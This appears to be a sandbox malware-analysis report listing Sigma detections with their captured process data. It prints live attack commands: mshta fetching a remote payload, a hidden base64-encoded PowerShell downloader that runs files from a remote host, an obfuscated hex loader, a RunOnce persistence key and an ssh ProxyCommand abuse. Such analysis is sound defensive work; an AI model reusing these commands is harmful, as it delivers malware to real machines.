Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/3VKKE.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/3VKKE.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://static.klipxuhaq.shop/3VKKE.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8108, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/3VKKE.mp4, ProcessId: 8188, ProcessName: mshta.exe

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Source: Process started

Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -WindowStyle Hidden -EncodedCommand JABhAEoAdwA3AD0AIgB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgA7ACQAawBOAHIAMwA9AC0AagBvAGkAbgAoACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0AHsAWwBjAGgAYQByAF0AJABfAH0AfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKwAiAC4AYgBpAG4AIgA7ACQAagBYAHEANAA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAIAAtAEMAaABpAGwAZABQAGEAdABoACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwB8AEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AFsAYwBoAGEAcgBdACQAXwB9ACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKQA7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAagBYAHEANAAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQB8AE8AdQB0AC0ATgB1AGwAbAA7ACQAcABIAHQANgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAYQBKAHcANwA7ACQAcwBXAGYAMgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAawBOAHIAMwA7ACQAdgBQAGIAOQA9ACIAaAB0AHQAcABzADoALwAvAGMAbgBkAGUAZgAxAC4AZwByAGUAZQBuAC0AcABhAHQAaAB3AGEAeQBzAC4AcwBoAG8AcAAvAGEAcABpAC8AdQB6AC8ANwA1ADUAMgA5ADcAMwA2ADUAMAAvAHUALgBiAGkAbgAiADsAJAB4AFEAZAA1AD0AIgBoAHQAdABwAHMAOgAvAC8AYwBuAGQAZQBmADEALgBnAHIAZQBlAG4ALQBwAGEAdABoAHcAYQB5AHMALgBzAGgAbwBwAC8AYQBwAGkALwB1AHoALwA3ADUANQAyADkANwAzADYANQAwAC8AbgBuAG4ALgBiAGkAbgAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdgBQAGIAOQAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABIAHQANgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB4AFEAZAA1ACAALQBPAHUAdABGAGkAbABlACAAJABzAFcAZgAyACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABIAHQANgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAHMAVwBmADIAOwAmACAAKABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgAKAAnAGUAJwArACcAeABpACcAKwAnAHQAJwApACAALQBqAG8AaQBuACAAJwAnACkAKQApAA== , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -WindowStyle Hidden -EncodedCommand JABhAEoAdwA3AD0AIgB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgA7ACQAawBOAHIAMwA9AC0AagBvAGkAbgAoACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0AHsAWwBjAGgAYQByAF0AJABfAH0AfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKwAiAC4AYgBpAG4AIgA7ACQAagBYAHEANAA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAIAAtAEMAaABpAGwAZABQAGEAdABoACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwB8AEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AFsAYwBoAGEAcgBdACQAXwB9ACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKQA7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAagBYAHEANAAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQB8AE8AdQB0AC0ATgB1AGwAbAA7ACQAcABIAHQANgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACA

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wrdZ($UvhG){return -split ($UvhG -replace '..', '0x$& ')};$ERHgk = wrdZ('ECA586FB867E54D080F88AB849BFB94F298E9D4D174F6B1F2F81610C3540C56191E34FB7B2DF87630478E180DACA97337CF338C5F0549579E18CC1A49A1339F9691FAE2EDAAC0D6E2AB4913030D45E7F9C40731A7B0ED45F438D15D573AB5E4816A3D8CA82DAA342D630EDB6E24E85F4D05E0447A728444A18214CD35DB1FD5C4C677BF1EB6DD62A0D4B42A5F996D056A8C58BF2B2ADC007CA0004F35EEDF7DB06CC47C0E8175257375360952646DDCE12F86A389A2FB4F08F04DF71ABBD10CA19394807E45AE262B4CF2BD880666BE9808038992E086339CA69F730462BD5BA268BEA9591B45C3FDDC4B990452C3C5B083B1D8A99DB9D344BE7F259679F7994FBAA4E272654402905FEB107236FDE83FA247F6DFF5EE2DE2FBE984DE8D33A5077EC31D65DAE7AAC344DB18BADD0E59C3DC0A20AA1776387E75ED82F6F21E81D436D435FE7641490C8BB3BE615F9D76B1F8A1323001EC29CB1DC720A20647927291ABFCCFF409B1F94A878B0CDB0AFF68E11DAF8B2CCB95D3B395C11FB1D2F79673936E5F6AF545B019BFDE71CDAC1667709524F9244C6D8B3198F1F28C92F507AF233B70FD15099184E521AA3D1F4EB4613BE4CC9617FD5EE373CB05A7B164A2B6211387C494F7FC2F64FB4B0EEC11B39FFCC4E09EE10E96070192D4E0E2AD737B857A3BA8766EF8B454E4CC9BAE60331184407821C7F5A417DEBB95885CD929FAC64B5913D45E20BA92710C789EA36BC01ED629BAAEEFB8F420E9D966E4669DB7E1EE213C1001073B4FB67BB454BA80B0144D096E4FA221E9AB74FB2FDA2CBBA9C669EB50610B810047A6A75A1E41407350666C1B141836EA4FB3C9588111CE216EB2E451248C7008EA09561E08463428A981B69214151A19DD58483CB4A07DA879953AA3FDBF8EC16A79ACD16FBF54B34E405FCE7D15727908982C71DB4EC3160579745FCBC610756535558573F49618C7606881E9C8F026001D9C1C40FD2462CC1EC3DCF620D160F23D6F789F8CAA4EE9835FD65AA1D0E0278809DE0D85C1295E58C782AAFF7016B75C2FBB65FE1F73E7B038C89BAA57C32930D22EE8C71A06F4A2C738995833A10226ECDFB07ECD5F6DA31617797E009FA791AB33D9189A3A8E44428EFC9D7C6FAC3474FD38038FE910BBB036CFF902B287315F807FAAA06AED95210DDE82DAEAC0A523D871AE53C0EF75EF61B9A57F8F33A81ABD5D297C8FA835397595E7202A8E9007FFC7EDE814D001B798D89293879C641BE0707A91665E5503FECF99138AC09675DB1C070F4CF90193587A5FFC1CEE76401544370EB81704BA787C0CD04C9585C45A98FE309B624E2A8DF58992BFB2E28E05D3E083F40D7259170B815F21C934D9A6B716FB374544D200AC2F51F83FF6015BF31FAF855ACD6F94C4EDCFFE1B1B1E84CD0DCE3476BE438811875890C244AF355F5A99D60D3FE596651A7FCE949EF11B75A3E47270440D77D7293E40B99F248B7EA50AE844851B9FCECC2A42A543848822154E0BDE72E753A37ABBC37D5A523E44824FDECB7EA3DA94AE0BC489AFB57E7FF8B9D330E6B6CF749C38703F35FBB8C7524C1CC772CB6E97F52B9A303F765EEA1CF88781CF03DBAF4E05C5E83D04900C62AE76C9060D2EF02C6358A9C35D3C5CADDA4513FE8720161EE8D258C9D8738089620A44FDD02266B9393340D2A4D6DF53670CE0EAC8ADF596CBD6821F99D9AA7D32C9C1C8CDD6A112CF9684123E95FA54979737993CA2ED54A8E4E7B526955F3B82D4D1180DCF858A68E630366BAE559198412C920E3DF514DC1275386D42B0CF7D7800F9A9C56DF30AC55BB715221A65AC5F1B6C047475AF5D327C3E5F8421DC5507C9898E1CA30BC70D6ED81C7FBE88DC6473A1B361F63E277C1B83D0BA47D9D3A44BB1ED147D9E3D1391B4E0C9728E31F4600C8F8CDC7EA1BB362F215217B57B713C7F2C9B60FFBB1ABFF32654C427DAA0BD39D0753919D0F4F7B47FF923BD6

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -WindowStyle Hidden -EncodedCommand JABhAEoAdwA3AD0AIgB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgA7ACQAawBOAHIAMwA9AC0AagBvAGkAbgAoACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0AHsAWwBjAGgAYQByAF0AJABfAH0AfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKwAiAC4AYgBpAG4AIgA7ACQAagBYAHEANAA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAIAAtAEMAaABpAGwAZABQAGEAdABoACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwB8AEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AFsAYwBoAGEAcgBdACQAXwB9ACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKQA7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAagBYAHEANAAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQB8AE8AdQB0AC0ATgB1AGwAbAA7ACQAcABIAHQANgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAYQBKAHcANwA7ACQAcwBXAGYAMgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAawBOAHIAMwA7ACQAdgBQAGIAOQA9ACIAaAB0AHQAcABzADoALwAvAGMAbgBkAGUAZgAxAC4AZwByAGUAZQBuAC0AcABhAHQAaAB3AGEAeQBzAC4AcwBoAG8AcAAvAGEAcABpAC8AdQB6AC8ANwA1ADUAMgA5ADcAMwA2ADUAMAAvAHUALgBiAGkAbgAiADsAJAB4AFEAZAA1AD0AIgBoAHQAdABwAHMAOgAvAC8AYwBuAGQAZQBmADEALgBnAHIAZQBlAG4ALQBwAGEAdABoAHcAYQB5AHMALgBzAGgAbwBwAC8AYQBwAGkALwB1AHoALwA3ADUANQAyADkANwAzADYANQAwAC8AbgBuAG4ALgBiAGkAbgAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdgBQAGIAOQAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABIAHQANgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB4AFEAZAA1ACAALQBPAHUAdABGAGkAbABlACAAJABzAFcAZgAyACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABIAHQANgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAHMAVwBmADIAOwAmACAAKABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgAKAAnAGUAJwArACcAeABpACcAKwAnAHQAJwApACAALQBqAG8AaQBuACAAJwAnACkAKQApAA== , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -WindowStyle Hidden -EncodedCommand JABhAEoAdwA3AD0AIgB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgA7ACQAawBOAHIAMwA9AC0AagBvAGkAbgAoACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0AHsAWwBjAGgAYQByAF0AJABfAH0AfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKwAiAC4AYgBpAG4AIgA7ACQAagBYAHEANAA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAIAAtAEMAaABpAGwAZABQAGEAdABoACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwB8AEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AFsAYwBoAGEAcgBdACQAXwB9ACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKQA7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAagBYAHEANAAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQB8AE8AdQB0AC0ATgB1AGwAbAA7ACQAcABIAHQANgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACA

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wrdZ($UvhG){return -split ($UvhG -replace '..', '0x$& ')};$ERHgk = wrdZ('ECA586FB867E54D080F88AB849BFB94F298E9D4D174F6B1F2F81610C3540C56191E34FB7B2DF87630478E180DACA97337CF338C5F0549579E18CC1A49A1339F9691FAE2EDAAC0D6E2AB4913030D45E7F9C40731A7B0ED45F438D15D573AB5E4816A3D8CA82DAA342D630EDB6E24E85F4D05E0447A728444A18214CD35DB1FD5C4C677BF1EB6DD62A0D4B42A5F996D056A8C58BF2B2ADC007CA0004F35EEDF7DB06CC47C0E8175257375360952646DDCE12F86A389A2FB4F08F04DF71ABBD10CA19394807E45AE262B4CF2BD880666BE9808038992E086339CA69F730462BD5BA268BEA9591B45C3FDDC4B990452C3C5B083B1D8A99DB9D344BE7F259679F7994FBAA4E272654402905FEB107236FDE83FA247F6DFF5EE2DE2FBE984DE8D33A5077EC31D65DAE7AAC344DB18BADD0E59C3DC0A20AA1776387E75ED82F6F21E81D436D435FE7641490C8BB3BE615F9D76B1F8A1323001EC29CB1DC720A20647927291ABFCCFF409B1F94A878B0CDB0AFF68E11DAF8B2CCB95D3B395C11FB1D2F79673936E5F6AF545B019BFDE71CDAC1667709524F9244C6D8B3198F1F28C92F507AF233B70FD15099184E521AA3D1F4EB4613BE4CC9617FD5EE373CB05A7B164A2B6211387C494F7FC2F64FB4B0EEC11B39FFCC4E09EE10E96070192D4E0E2AD737B857A3BA8766EF8B454E4CC9BAE60331184407821C7F5A417DEBB95885CD929FAC64B5913D45E20BA92710C789EA36BC01ED629BAAEEFB8F420E9D966E4669DB7E1EE213C1001073B4FB67BB454BA80B0144D096E4FA221E9AB74FB2FDA2CBBA9C669EB50610B810047A6A75A1E41407350666C1B141836EA4FB3C9588111CE216EB2E451248C7008EA09561E08463428A981B69214151A19DD58483CB4A07DA879953AA3FDBF8EC16A79ACD16FBF54B34E405FCE7D15727908982C71DB4EC3160579745FCBC610756535558573F49618C7606881E9C8F026001D9C1C40FD2462CC1EC3DCF620D160F23D6F789F8CAA4EE9835FD65AA1D0E0278809DE0D85C1295E58C782AAFF7016B75C2FBB65FE1F73E7B038C89BAA57C32930D22EE8C71A06F4A2C738995833A10226ECDFB07ECD5F6DA31617797E009FA791AB33D9189A3A8E44428EFC9D7C6FAC3474FD38038FE910BBB036CFF902B287315F807FAAA06AED95210DDE82DAEAC0A523D871AE53C0EF75EF61B9A57F8F33A81ABD5D297C8FA835397595E7202A8E9007FFC7EDE814D001B798D89293879C641BE0707A91665E5503FECF99138AC09675DB1C070F4CF90193587A5FFC1CEE76401544370EB81704BA787C0CD04C9585C45A98FE309B624E2A8DF58992BFB2E28E05D3E083F40D7259170B815F21C934D9A6B716FB374544D200AC2F51F83FF6015BF31FAF855ACD6F94C4EDCFFE1B1B1E84CD0DCE3476BE438811875890C244AF355F5A99D60D3FE596651A7FCE949EF11B75A3E47270440D77D7293E40B99F248B7EA50AE844851B9FCECC2A42A543848822154E0BDE72E753A37ABBC37D5A523E44824FDECB7EA3DA94AE0BC489AFB57E7FF8B9D330E6B6CF749C38703F35FBB8C7524C1CC772CB6E97F52B9A303F765EEA1CF88781CF03DBAF4E05C5E83D04900C62AE76C9060D2EF02C6358A9C35D3C5CADDA4513FE8720161EE8D258C9D8738089620A44FDD02266B9393340D2A4D6DF53670CE0EAC8ADF596CBD6821F99D9AA7D32C9C1C8CDD6A112CF9684123E95FA54979737993CA2ED54A8E4E7B526955F3B82D4D1180DCF858A68E630366BAE559198412C920E3DF514DC1275386D42B0CF7D7800F9A9C56DF30AC55BB715221A65AC5F1B6C047475AF5D327C3E5F8421DC5507C9898E1CA30BC70D6ED81C7FBE88DC6473A1B361F63E277C1B83D0BA47D9D3A44BB1ED147D9E3D1391B4E0C9728E31F4600C8F8CDC7EA1BB362F215217B57B713C7F2C9B60FFBB1ABFF32654C427DAA0BD39D0753919D0F4F7B47FF923BD6

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ehcfdbh\AutoIt3.exe" C:\ehcfdbh\bhcbhah.a3x, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\71532689\updater.exe, ProcessId: 8800, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\bhcbhah

Sigma detected: Lolbin Ssh.exe Use As Proxy

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp, CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp, CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\sftp.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')" ., ParentImage: C:\Windows\System32\OpenSSH\sftp.exe, ParentProcessId: 7832, ParentProcessName: sftp.exe, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp, ProcessId: 7936, ProcessName: ssh.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -WindowStyle Hidden -EncodedCommand JABhAEoAdwA3AD0AIgB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgA7ACQAawBOAHIAMwA9AC0AagBvAGkAbgAoACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0AHsAWwBjAGgAYQByAF0AJABfAH0AfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKwAiAC4AYgBpAG4AIgA7ACQAagBYAHEANAA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAIAAtAEMAaABpAGwAZABQAGEAdABoACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwB8AEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AFsAYwBoAGEAcgBdACQAXwB9ACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKQA7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAagBYAHEANAAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQB8AE8AdQB0AC0ATgB1AGwAbAA7ACQAcABIAHQANgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAYQBKAHcANwA7ACQAcwBXAGYAMgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAawBOAHIAMwA7ACQAdgBQAGIAOQA9ACIAaAB0AHQAcABzADoALwAvAGMAbgBkAGUAZgAxAC4AZwByAGUAZQBuAC0AcABhAHQAaAB3AGEAeQBzAC4AcwBoAG8AcAAvAGEAcABpAC8AdQB6AC8ANwA1ADUAMgA5ADcAMwA2ADUAMAAvAHUALgBiAGkAbgAiADsAJAB4AFEAZAA1AD0AIgBoAHQAdABwAHMAOgAvAC8AYwBuAGQAZQBmADEALgBnAHIAZQBlAG4ALQBwAGEAdABoAHcAYQB5AHMALgBzAGgAbwBwAC8AYQBwAGkALwB1AHoALwA3ADUANQAyADkANwAzADYANQAwAC8AbgBuAG4ALgBiAGkAbgAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdgBQAGIAOQAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABIAHQANgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB4AFEAZAA1ACAALQBPAHUAdABGAGkAbABlACAAJABzAFcAZgAyACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABIAHQANgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAHMAVwBmADIAOwAmACAAKABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgAKAAnAGUAJwArACcAeABpACcAKwAnAHQAJwApACAALQBqAG8AaQBuACAAJwAnACkAKQApAA== , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -WindowStyle Hidden -EncodedCommand JABhAEoAdwA3AD0AIgB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgA7ACQAawBOAHIAMwA9AC0AagBvAGkAbgAoACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0AHsAWwBjAGgAYQByAF0AJABfAH0AfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKwAiAC4AYgBpAG4AIgA7ACQAagBYAHEANAA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAIAAtAEMAaABpAGwAZABQAGEAdABoACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwB8AEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AFsAYwBoAGEAcgBdACQAXwB9ACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKQA7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAagBYAHEANAAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQB8AE8AdQB0AC0ATgB1AGwAbAA7ACQAcABIAHQANgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACA

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']'), CommandLine: powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] 